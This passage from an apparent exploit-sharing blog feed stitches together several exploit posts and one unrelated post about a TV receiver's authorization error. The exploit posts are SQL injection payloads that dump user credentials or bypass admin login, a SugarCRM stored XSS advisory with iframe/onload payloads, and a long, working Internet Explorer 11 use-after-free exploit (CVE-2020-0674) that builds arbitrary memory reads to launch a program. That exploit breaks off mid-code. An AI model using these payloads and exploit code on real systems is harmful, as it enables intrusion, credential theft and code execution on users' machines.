<?php $qry = $conn->query("SELECT * FROM cars where id= ".$_GET['car_id']); foreach($qry->fetch_array() as $k => $val){ $$k=$val; } Vulnerable param: id ------------------------------------------------------------------------- GET /car_rental/index.php?page=view_car&id=-3+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+users# HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Source Code: view_car.php: -------------------------------------------------------------------- <?php if(isset($_GET['id'])){ if(isset($_GET['id'])){ $qry = $conn->query("SELECT * FROM cars where id= ".$_GET['id']);
  19. HireHackking

    Title: [Miscellaneous Talk] Recording the debugging of household connections and E04 This channel is not authorized. Solution

    HireHackking posted a blog entry in Hacker Technology
    With the popularity of the Internet and smart TVs, old-fashioned TVs and the way of watching programs through the "TV pot" are gradually eliminated. Although new things will inevitably ban old things is a trend of historical development. But if there are elderly people at home, smart TVs will not be used and all kinds of disgusting fees are charged. It’s still too difficult to tell the old man! Background When I went home during the Chinese New Year, the elderly in the village said that the TV at home was no longer available. I haven't turned on the TV for almost a year. With a try-watch mentality, I started to modulate the TV program. Connection and debugging For debugging of old-style "TV pots", the difficulty lies in the different deflection directions and high and low parameters in different regions. There are two ways to solve the problem of deflection angle. The first method can be done by referring to the deflection angle and height of the TV pot of the same village user. The second method is to follow the WeChat official account "State Administration of Radio, Film and Television" WeChat official account, and click the manual customer service to consult according to your location. If nothing unexpected happens, the signal strength and signal quality will turn green. Click Automatic Search to see the corresponding program. E04 This channel is not authorized The main reason for this error is that the device is shut down for a long time and the corresponding authorization information is lost. We need to reactivate it! First, unplug the card of the household connection while the computer is turned on and find the card number. Then the frequency is tuned to 999 units. Just activate according to the prompts. It is recommended to call the customer service directly to reactivate it. It may take a long time to activate the official account. After activation, wait for about 2-5 minutes before the screen appears. To be honest, it is still convenient to watch TV this way. There is no network delay and no need to watch TV.
  20. HireHackking

    SugarCRM 6.5.18 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SugarCRM 6.5.18 - Persistent Cross-Site Scripting # Exploit Author: Vulnerability-Lab # Date: 2020-11-16 # Vendor Homepage: https://www.sugarcrm.com # Version: 6.5.18 Document Title: =============== SugarCRM v6.5.18 - (Contacts) Persistent Cross Site Web Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2249 Release Date: ============= 2020-11-16 Vulnerability Laboratory ID (VL-ID): ==================================== 2249 Common Vulnerability Scoring System: ==================================== 5.1 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 2.000€ - 3.000€ Product & Service Introduction: =============================== SugarCRM empowers your marketing, sales and services teams to collaborate across the entire customer lifecycle for more meaningful, memorable experiences. More than 2 million users in 120 countries have switched to SugarCRM to fuel extraordinary customer experiences. We have disrupted the market with a relentless pursuit of innovation and visionary solutions, bringing the world’s first no-touch, time-aware CX platform. The CX suite aggregates the millions of different data points on your customers and turns them into proactive truths, trends and predictions for you to leverage. (Copy of the Homepage: https://www.sugarcrm.com ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site scripting web vulnerability in the official SugarCRM v6.5.18 web-application. Affected Product(s): ==================== SugarCRM Product: SugarCRM v6.5.18 - CRM (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-03: Researcher Notification & Coordination (Security Researcher) 2020-05-04: Vendor Notification (Security Department) 2020-05-24: Vendor Notification (Security Department) ****-**-**: Vendor Response/Feedback (Security Department) ****-**-**: Vendor Fix/Patch (Service Developer Team) ****-**-**: Security Acknowledgements (Security Department) 2020-11-16: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official SugarCRM v6.5.18 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent cross site web vulnerability is located in the primary address state and alternate address state input fields of the sales or support module open to create a contacts. Remote attackers with low privileged sugarcrm accounts are able to inject own malicious script code as contact. Higher privileged application user accounts will execute the script code on preview of the created contact to e.g gain moderator or administrator rights via session hijacking, phishing or further persistent manipulative web attacks. The code does not only execute in the same section were the contact is listed or previewed but also after save in the view log function context. The attack can thus way be performed via create of a contact or via import of a vcf file contact. The request method to inject is POST and the attack is limited to registered user accounts with default contact to the contacts module. The script code is able to bypass the basic validation process because of the primary address state and alternate address state are exchanged in the transmit request. Normally in a regular transmit the context is parsed securely. In the actual case an attacker injects script code in the alternate adress when changing the main adress the wrong sanitized code occurs in the front-end. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Sales [+] Support Vulnerable Input(s): [+] Primary Address State [+] Alternate Address State Vulnerable Parameter(s): [+] primary address state [+] alternate address state Affected Module(s): [+] Sales - Contact List [+] Support - Contact List Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the sugarcrm application 2. Login as low privileged user account 3. Move to sales or support and click to contact, then open create a new contact 4. Inject payload in the other address and primary adress to the alternate address state and primary state input fields 5. Save the entry and a refresh occurs with the inserted contact details Note: The script code execute immediatly after saving in the primary adress state and alternate adress state section of both modules 6. Successful reproduce of the persistent cross site scripting web vulnerability! PoC: Payload ><iframe src=evil.source onload=alert(document.domain)> PoC: Vulnerable Source <tr><td scope="col" width="12.5%"> Primary Address: </td> <td width="37.5%"> <table width="100%" cellspacing="0" cellpadding="0" border="0"> <tbody><tr> <td width="99%"> <input type="hidden" class="sugar_field" id="primary_address_street" value="q"> <input type="hidden" class="sugar_field" id="primary_address_city" value="a"> <input type="hidden" class="sugar_field" id="primary_address_state" value="[MALICIOUS JAVASCRIPT PAYLOAD EXECUTION!]"> <input type="hidden" class="sugar_field" id="primary_address_country" value="y"> <input type="hidden" class="sugar_field" id="primary_address_postalcode" value="p"> </td><td class="dataField" width="1%"> </td></tr> </tbody></table></td> <td scope="col" width="12.5%"> Other Address:</td> <td width="37.5%"> <table width="100%" cellspacing="0" cellpadding="0" border="0"> <tbody><tr><td width="99%"> <input type="hidden" class="sugar_field" id="alt_address_street" value="n"> <input type="hidden" class="sugar_field" id="alt_address_city" value="a"> <input type="hidden" class="sugar_field" id="alt_address_state" value=">"[MALICIOUS JAVASCRIPT PAYLOAD EXECUTION!]"> <input type="hidden" class="sugar_field" id="alt_address_country" value="k"> <input type="hidden" class="sugar_field" id="alt_address_postalcode" value="r"> </td> <td class="dataField" width="1%"> </td> </tr> </tbody></table> </td> </tr> --- PoC Session Logs [POST] --- https://sugar-crm.localhost:8000/index.php Host: sugar-crm.localhost:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1336 Origin: https://sugar-crm.localhost:8000 Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= Connection: keep-alive Referer: https://sugar-crm.localhost:8000/index.php Cookie: p7token=677939c76f1b303862ac57ac3592a50e; checkCookie=1; PHPWMADMINSESSID=di26ub5h6fegtndktcu4qbkhc1; PHPSESSID=t1glh0rluv1cl7h0oh4i1nius4; sugar_user_theme=Sugar5; ck_login_id_20=1; ck_login_language_20=en_us; EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; EmailTreeLayout=42f3ef1b-3d1b-eac3-16a7-5eaeeeaae11c=false& 713e7381-3309-2845-3c71-5eaeee59f0ca=false&be8b5121-f32c-13fd-cd9c-5eaeeec3b167=false& e3e40862-d8f3-77f0-f92e-5eaeee07eb24=false; Meetings_divs=history_v%3D%23 - module=Contacts&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&isDuplicate=false&action=Save&return_module=Contacts& return_action=DetailView&return_id=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&module_tab=&contact_role=&relate_to=Contacts& relate_id=45ab08a6-6ca8-fd0f-c4cb5eaef0e0ef02&offset=1&opportunity_id=&case_id=&bug_id=&email_id=&inbound_email_id=& salutation=Mr.&first_name=nam23&last_name=e&phone_work=n&title=r&phone_mobile=h&department=t&phone_fax=k&account_name=& account_id=&primary_address_street=h&primary_address_city=z& primary_address_state=t<iframe src=evil.source onload=aler(document.cookie)>&primary_address_postalcode=b& primary_address_country=v&alt_address_street=h&alt_address_city=z&alt_address_state=t<iframe src=evil.source onload=alert(document.cookie)>&alt_address_postalcode=b&alt_address_country=v&alt_checkbox=on&Contacts_email_widget_id=0& emailAddressWidget=1&Contacts0emailAddress0=&Contacts0emailAddressId0=& Contacts0emailAddressPrimaryFlag=Contacts0emailAddress0&Contacts0emailAddressVerifiedFlag0=true& Contacts0emailAddressVerifiedValue0=&useEmailWidget=true&description=v<iframe src=a>&report_to_name=& reports_to_id=&sync_contact=0,1&lead_source=Web Site&do_not_call=0&campaign_name=&campaign_id=& assigned_user_name=h%20m&assigned_user_id=1 - POST: HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Location: index.php?action=DetailView&module=Contacts&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&offset=1 Server: Microsoft-IIS/8.5 Set-Cookie: ck_login_id_20=1; Max-Age=7776000; path=/; domain=sugar-crm.localhost:8000 ck_login_language_20=en_us; Max-Age=7776000; path=/; domain=sugar-crm.localhost:8000 sugar_user_theme=Sugar5; Max-Age=31536000 X-Powered-By: ASP.NET Content-Length: 231 https://sugar-crm.localhost:8000/index.php?module=Contacts&action=index https://sugar-crm.localhost:8000/index.php?module=Audit&action=Popup&query=true&record=45ab08a6-6ca8-fd0f-c4cb-5eaef0e0ef02&module_name=Contacts https://sugar-crm.localhost:8000/index.php?module=Import&action=Step1&import_module=Contacts&return_module=Contacts&return_action=index Solution - Fix & Patch: ======================= The vulnerability can be patched following the next steps ... 1. Restrict the input fields and disallow special chars for the main name values displayed in the list 2. Escape the input transmitted from the alternate and primary inputs 3. Parse and sanitize the ouput location to ensure its filtered securely Security Risk: ============== The security risk of the persistent cross site web vulnerability in the sugarcrm web-application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
  21. HireHackking

    EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel Exploit - SQLi Auth Bypass # Date: 17-11-2020 # Exploit Author: Kislay Kumar # Vendor Homepage: http://egavilanmedia.com # Software Link : http://egavilanmedia.com/user-registration-and-login-system-with-admin-pane=l/ # Version: N/A (Default) # Tested on: Kali Linux SQL Injection: SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data. Attack Vector: An attacker can gain admin panel access using malicious sql injection queri= es. Steps to reproduce: 1. Open admin login page using following URl: -> http://localhost/admin/login.html 2. Now put below Payload in both the fields( User ID & Password) Payload: admin' or '1'='1 3. Server accepted our payload and we bypassed admin panel without any credentials, IMPACT: if any attacker can gain admin panel access than they can Update & Delete Userdata Suggested Mitigation/Remediation Actions Parameterized queries should be used to separate the command and data portions of the intended query to the database. These queries prevent an attacker from tampering with the query logic and extending a concatenated database query string. Code reviews should be conducted to identify any additional areas were the application or other applications in the organization are vulnerable to this attack. Additionally, input validation should be enforced on the server side in order to ensure that only expected data is sent in queries. Where possible security specific libraries should be used in order to provide an additional layer of protection.
  22. HireHackking

    Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Doctor Appointment Booking System PHP and Mysql 1.0 - 'q' SQL Injection # Google Dork: N/A # Date: 11/16/2020 # Exploit Author: Ramil Mustafayev # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-doctor-appointment-booking-system-php-and-mysql/ # Software Link: https://projectworlds.in/wp-content/uploads/2020/05/PHP-Doctor-Appointment-System.zip # Version: 1.0 # Tested on: Win10 x64, Kali Linux x64 # CVE : N/A ######## Description ######## # # An SQL injection vulnerability was discovered in PHP-Doctor-Appointment-System. # # In getuser.php file, GET parameter 'q' is vulnerable. # # The vulnerability could allow for the improper neutralization of special elements in SQL commands and may lead to the product being vulnerable to SQL injection. # ############################# Vulnerable code: include_once 'assets/conn/dbconnect.php'; $q = $_GET['q']; // Vulnerable param // echo $q; $res = mysqli_query($con,"SELECT * FROM doctorschedule WHERE scheduleDate='$q'"); // Injection point Used Payload: http://localhost/[PATH]/getuser.php?q=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7162717671%2CIFNULL%28CAST%28schema_name%20AS%20NCHAR%29%2C0x20%29%2C0x7176627871%29%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA%23 Output: Extracted database: qbqvqdb_healthcareqvbxq
  23. HireHackking

    Microsoft Internet Explorer 11 - Use-After-Free

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Microsoft Internet Explorer 11 - Use-After-Free # Date: 2020-05-07 # Exploit Author: maxpl0it # Vendor Homepage: https://www.microsoft.com/ # Software Link: https://www.microsoft.com/en-gb/download/internet-explorer.aspx # Version: IE 8, 9, 10, and 11 # Tested on: Windows 7 (x64) # CVE : CVE-2020-0674 <!DOCTYPE html> <html> <head> <meta http-equiv="x-ua-compatible" content="IE=EmulateIE8" /> <script language="JScript.Compact"> // ------------------------------------------------------------------------------------------------- // // Credits: // maxpl0it (@maxpl0it) - Writing the exploit // Qihoo 360 - Identifying the vulnerability in the wild // // // Vulnerability: Use-After-Free when Array.sort() is called with a comparator function. The two // arguments are untracked by the garbage collector. // // Exploit Description: This exploit was written for 64-bit IE instances. // However, Enhanced Protected Mode sandboxing could be enabled for IE 10 // and IE 11 because EPM on Windows 7 simply enables x64 and doesn't do // much else. // The exploit executes C:\Windows\System32\calc.exe but doesn't implement // any form of process continuation after execution. // // Testing: // OS tested on: Windows 7 // IE versions tested on: // 8 (x64 version) // 9 (x64 version) // 10 (Either the TabProcGrowth registry key set or Enhanced Protected Mode enabled to use x64) // 11 (Either the TabProcGrowth registry key set or Enhanced Protected Mode enabled to use x64) // // Further notes: // Video at https://twitter.com/maxpl0it/status/1253396942048104448 // // The debug is better viewed in the console. Open Developer Tools and enable debug below. // // This is the non-EMET-bypassing version and only handles the stack pivot check and EAF. // // If you receive the error "Couldn't rewrite variable", verify that this is 64-bit IE and not a // 32-bit process (iexplorer.exe and not iexplorer.exe *32) // // ------------------------------------------------------------------------------------------------------ // write_debug: Used to show debugging output. function write_debug(str_to_write) { if(debug) { // Switch is below try{ console.log(str_to_write); // In IE, console only works if devtools is open. } catch(e) { try { alert(str_to_write); // A lot of popups but provides information. } catch(e) { // Otherwise, nothing. } } } } // Globals var depth; // Used to track the depth of the recursion for the exploit function. var spray; // Used to spray objects and fill GcBlocks. var overlay; // Used to hold objects that will eventually contain properties that will reallocate freed GcBlocks. var overlay_backup; // Used to make sure that the overlay objects still have a reference after the exploit is done. Otherwise they would be freed and reallocated. var variants; // A string that contains a bunch of fake VAR structures. This is the property name that will cause the freed GcBlock to be reallocated. var total; // Used to hold the untracked variable pointers for the use-after-free. var leak_lower; // Holds the least significant DWORD of the 'next VVAL' pointer leak. var leak_offset; // Since we don't want to free all overlay variables, this value will be used to identify which property we have got a pointer for so only this will be freed and reallocated later. var leak_verify_var; // Used to verify that the rewrite worked. If the overlay cannot be freed and reallocated, then the exploit will not work. var fakeobj_var; // Points at the property name string in the final VVAL. When the property name changes, a fake VAR is constructed in the name string and will change this fakeobj_var's type and object pointer values. var trigger_obj; // Will contain the fake object and vftable. var context; // Will store the context structure for NtContinue. var padding = "AAAAAAAAAAA"; // Padding aligns so that the property with the manipulated hash will end up on top of an untracked var. var leak = "\u0005"; // This manipulates the hash of the VVAL. var leaked_var = "A"; // The final object property name. Needs to be created so that the 'next VVAL' pointer of the manipulated hash VVAL is filled. var spray_size = 20000; // The size of the spray array. var overlay_size = 20000; // The size of the overlay array. var pad_size = 3000; // The size of padding for the trigger object. This padding adds additional space for functions like WinExec() to add their stack frames and the stack frames of the functions they call. var sort = new Array(); // The array to be sorted with the vulnerable function. var lfh = new Array(); // An array used to trigger lfh. var debug = false; // Whether write_debug will do anything. var command = "\u3a43\u575c\u6e69\u6f64\u7377\u535c\u7379\u6574\u336d\u5c32\u6163\u636c\u652e\u6578"; // The command to be executed. In this case it's "C:\Windows\System32\calc.exe" // Setup - fills the sort array with arrays to be sorted. Done first to avoid the stack setup getting messed up. for(i = 0; i < 310; i++) sort[i] = [0, 0]; // lfh_trigger: Used to trigger LFH for a particular size. function lfh_trigger() { for(i = 0; i < 50; i++) { tmp = new Object(); tmp[Array(570).join('A')] = 1; lfh.push(tmp); } } // reset: Resets the objects used in the function initial_exploit so it could be used again. function reset() { depth = 0; spray = new Array(); overlay = new Array(); total = new Array(); for(i = 0; i < overlay_size; i++) overlay[i] = new Object(); // Overlay must happen before spray for(i = 0; i < spray_size; i++) spray[i] = new Object(); CollectGarbage(); } // make_variant: Creates a fake VAR in a string. function make_variant(type, obj_ptr_lower, obj_ptr_upper, next_ptr_lower, next_ptr_upper) { var charCodes = new Array(); charCodes.push( // type type, 0, 0, 0, // obj_ptr obj_ptr_lower & 0xffff, (obj_ptr_lower >> 16) & 0xffff, obj_ptr_upper & 0xffff, (obj_ptr_upper >> 16) & 0xffff, // next_ptr next_ptr_lower & 0xffff, (next_ptr_lower >> 16) & 0xffff, next_ptr_upper & 0xffff, (next_ptr_upper >> 16) & 0xffff ); return String.fromCharCode.apply(null, charCodes); } // set_variants: A wrapper for make_variant that allocates and pads the property names to align the fake VARs correctly in memory. function set_variants(type, obj_ptr_lower, obj_ptr_upper, next_ptr_lower, next_ptr_upper) { variants = "AAAAAAAA"; for(i=0; i < 46; i++) { variants += make_variant(type, obj_ptr_lower, obj_ptr_upper, next_ptr_lower, next_ptr_upper); } variants += "AAAAAAAAA"; } // initial_exploit: The main exploit function. function initial_exploit(untracked_1, untracked_2) { untracked_1 = spray[depth*2]; untracked_2 = spray[depth*2 + 1]; if(depth > 150) { spray = new Array(); // Erase spray CollectGarbage(); // Add to free for(i = 0; i < overlay_size; i++) { overlay[i][variants] = 1; overlay[i][padding] = 1; overlay[i][leak] = 1; overlay[i][leaked_var] = i; // Used to identify which leak is being used } total.push(untracked_1); total.push(untracked_2); return 0; } // Set pointers depth += 1; sort[depth].sort(initial_exploit); total.push(untracked_1); total.push(untracked_2); return 0; } // rewrite: Frees the correct overlay object and reallocate over it as to replace the object at the leaked 'next property' pointer. function rewrite(v, i){ CollectGarbage(); // Get rid of anything lingering that might screw up the exploit overlay_backup[leak_offset] = null; // Erase the object to be replaced CollectGarbage(); // Clear leak overlay_backup[leak_offset] = new Object(); // New object - Might end up in the same slot as the last object overlay_backup[leak_offset][variants] = 1; // Re-allocate the newly freed location (Take up the original GcBlock location again) overlay_backup[leak_offset][padding] = 1; // Add padding to align the hash with the type to leak the 'next property' pointer overlay_backup[leak_offset][leak] = 1; // The hash-manipulating property overlay_backup[leak_offset][v] = i; // sets the property name and the initial VAR } // read_pointer: Rewrites the property and changes the fakeobj_var variable to a string at a specified location. This sets up the read primitive. function read_pointer(addr_lower, addr_higher, o) { rewrite(make_variant(8, addr_lower, addr_higher), o); } // read_byte: Reads the byte at the address using the length of the BSTR. function read_byte(addr_lower, addr_higher, o) { read_pointer(addr_lower + 2, addr_higher, o); // Use the length. However, when the length is found, it is divided by 2 (BSTR_LENGTH >> 1) so changing this offset allows us to read a byte properly. return (fakeobj_var.length >> 15) & 0xff; // Shift to align and get the byte. } // read_word: Reads the WORD (2 bytes) at the specified address. function read_word(addr_lower, addr_higher, o) { read_pointer(addr_lower + 2, addr_higher, o); return ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8); } // read_dword: Reads the DWORD (4 bytes) at the specified address. function read_dword(addr_lower, addr_higher, o) { read_pointer(addr_lower + 2, addr_higher, o); lower = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8); read_pointer(addr_lower + 4, addr_higher, o); upper = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8); return lower + (upper << 16); } // read_qword: Reads the QWORD (8 bytes) at the specified address. function read_qword(addr_lower, addr_higher, o) { // Lower read_pointer(addr_lower + 2, addr_higher, o); lower_lower = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8); read_pointer(addr_lower + 4, addr_higher, o); lower_upper = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8); // Upper read_pointer(addr_lower + 6, addr_higher, o); upper_lower = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8); read_pointer(addr_lower + 8, addr_higher, o); upper_upper = ((fakeobj_var.length >> 15) & 0xff) + (((fakeobj_var.length >> 23) & 0xff) << 8); return {'lower': lower_lower + (lower_upper << 16), 'upper': upper_lower + (upper_upper << 16)}; } // test_read: Used to test whether the arbitrary read works. leak_lower + 64 points to the fakeobj_var location (property name string). The byte at this address is therefore expected to be 8 (String VAR type). function test_read() { if(read_byte(leak_lower + 64) != 8) { throw Error("Arbitrary read failed."); } } // test_fakeobj: Used to test whether fakeoj_var responds as expected when the type and value is changed. function test_fakeobj() { rewrite(make_variant(3, 23)); if(fakeobj_var + "" != 23) { // Turning it to a string causes the conversion to copy, dereferencing the 0x80 type. Type 0x80 being used directly won't work. throw Error("Couldn't re-write fakeobj variable"); } } // test_rewrite: Used to test whether the VAR in the VVAL leaked address changes as expected. function test_rewrite() { rewrite(leaked_var, 23); if(leak_verify_var + "" != 23) { throw Error("Couldn't re-write variable"); } } // addrof: The 'address-of' primitive. Changes the VAR at the start of the VVAL to point to a given object and changes the fakeobj_var string to point to the object pointer of this VAR, thus allowing the address to be read. function addrof(o) { var_addr = read_dword(leak_lower + 8, 0, o); // Dereference the first VAR return read_dword(var_addr + 8, 0, 1); // Get the Object pointer of the second VAR } // find_module_base: Finds the base of a module from a leaked pointer. Works by zeroing the least significant 16 bits of the address and subtracting 0x10000 until the DOS stub code is found at a specified offset. function find_module_base(ptr) { ptr.lower = (ptr.lower & 0xFFFF0000) + 0x4e; // Set to starting search point while(true) { if(read_dword(ptr.lower, ptr.upper) == 0x73696854) { // The string 'This' write_debug("[+] Found module base!"); ptr.lower -= 0x4e; // Subtract the offset to get the base return ptr; } ptr.lower -= 0x10000; } } // leak_jscript_base: Gets the base of the jscript module by creating a new object, following the object pointers until the vftable is found, and then using the vftable leak to identify the base of jscript.dll. function leak_jscript_base() { // Create an object to leak vftable obj = new Object(); // Get address of the object pointer obj_ptr_addr = addrof(obj); write_debug("[+] Object ptr at 0x" + obj_ptr_addr.toString(16)); // Get address of the vftable vftable_addr = read_qword(obj_ptr_addr, 0, 1); write_debug("[+] Vftable at upper 0x" + vftable_addr.upper.toString(16) + " and lower 0x" + vftable_addr.lower.toString(16)); return find_module_base(vftable_addr); } // leak_var: Executes the main exploit function in order to leak a 'next property' pointer. function leak_var() { reset(); variants = Array(570).join('A'); // Create the variants sort[depth].sort(initial_exploit); // Exploit overlay_backup = overlay; // Prevent it from being freed and losing our leaked pointer leak_lower = undefined; for(i = 0; i < total.length; i++) { if(typeof total[i] === "number" && total[i] % 1 != 0) { leak_lower = (total[i] / 4.9406564584124654E-324); // This division just converts the float into an easy-to-read 32-bit number break; } } } // get_rewrite_offset: Executes the main exploit function again in order to create a number of fake VARs that point to the leaked location. This means that the object pointer can be read and the exact offset of the leaked property in the overlay array can be identified. function get_rewrite_offset() { reset(); set_variants(0x80, leak_lower); // Find the number of the object sort[depth].sort(initial_exploit); // Exploit for(i = 0; i < total.length; i++) { if(typeof total[i] === "number") { leak_offset = parseInt(total[i] + ""); leak_verify_var = total[i]; break; } } } // get_fakeobj: Identifies the fakeobj_var. function get_fakeobj() { rewrite(make_variant(3, 1234)); // Turn the name of the property into a variant reset(); set_variants(0x80, leak_lower + 64); // Create a fake VAR pointing to the name of the property sort[depth].sort(initial_exploit); // Exploit for(i = 0; i < total.length; i++) { if(typeof total[i] === "number") { if(total[i] + "" == 1234) { fakeobj_var = total[i]; break; } } } } // leak_module: Used to leak a pointer for a given module that is imported by another module by traversing the PE structure in-memory. function leak_module(base, target_name_lower, target_name_upper) { // Get IMAGE_NT_HEADERS pointer module_lower = base.lower + 0x3c; // PE Header offset location module_upper = base.upper; file_addr = read_dword(module_lower, module_upper, 1); write_debug("[+] PE Header offset = 0x" + file_addr.toString(16)); // Get imports module_lower = base.lower + file_addr + 0x90; // Import Directory offset location import_dir = read_dword(module_lower, module_upper, 1); write_debug("[+] Import offset = 0x" + import_dir.toString(16)); // Get import size module_lower = base.lower + file_addr + 0x94; // Import Directory offset location import_size = read_dword(module_lower, module_upper, 1); write_debug("[+] Size of imports = 0x" + import_size.toString(16)); // Find module module_lower = base.lower + import_dir; while(import_size != 0) { name_ptr = read_dword(module_lower + 0xc, module_upper, 1); // 0xc is the offset to the module name pointer if(name_ptr == 0) { throw Error("Couldn't find the target module name"); } name_lower = read_dword(base.lower + name_ptr, base.upper); name_upper = read_dword(base.lower + name_ptr + 4, base.upper); if(name_lower == target_name_lower && name_upper == target_name_upper) { write_debug("[+] Found the module! Leaking a random module pointer..."); iat = read_dword(module_lower + 0x10, module_upper); // Import Address Table leaked_address = read_qword(base.lower + iat + 8, base.upper); // +8 since __imp___C_specific_handler can cause issues when imported in some jscript instances write_debug("[+] Leaked address at upper 0x" + leaked_address.upper.toString(16) + " and lower 0x" + leaked_address.lower.toString(16)); return leaked_address; } import_size -= 0x14; // The size of each entry module_lower += 0x14; // Increase entry pointer } } // leak_export: Finds the location of a given exported function in a module. Works using binary search in order to speed it up. Assumes that the export name order is alphabetical. function leak_export(base, target_name_first, target_name_second, target_name_third, target_name_fourth) { // Get IMAGE_NT_HEADERS pointer module_lower = base.lower + 0x3c; // PE Header offset location module_upper = base.upper; file_addr = read_dword(module_lower, module_upper, 1); write_debug("[+] PE Header offset at 0x" + file_addr.toString(16)); // Get exports module_lower = base.lower + file_addr + 0x88; // Export Directory offset location export_dir = read_dword(module_lower, module_upper, 1); write_debug("[+] Export offset at 0x" + import_dir.toString(16)); // Get the number of exports module_lower = base.lower + export_dir + 0x14; // Number of items offset export_num = read_dword(module_lower, module_upper, 1); write_debug("[+] Export count is " + export_num); // Get the address offset module_lower = base.lower + export_dir + 0x1c; // Address offset addresses = read_dword(module_lower, module_upper, 1); write_debug("[+] Export address offset at 0x" + addresses.toString(16)); // Get the names offset module_lower = base.lower + export_dir + 0x20; // Names offset names = read_dword(module_lower, module_upper, 1); write_debug("[+] Export names offset at 0x" + names.toString(16)); // Get the ordinals offset module_lower = base.lower + export_dir + 0x24; // Ordinals offset ordinals = read_dword(module_lower, module_upper, 1); write_debug("[+] Export ordinals offset at 0x" + ordinals.toString(16)); // Binary search because linear search is too slow upper_limit = export_num; // Largest number in search space lower_limit = 0; // Smallest number in search space num_pointer = Math.floor(export_num/2); module_lower = base.lower + names; search_complete = false; while(!search_complete) { module_lower = base.lower + names + 4*num_pointer; // Point to the name string offset function_str_offset = read_dword(module_lower, module_upper, 0); // Get the offset to the name 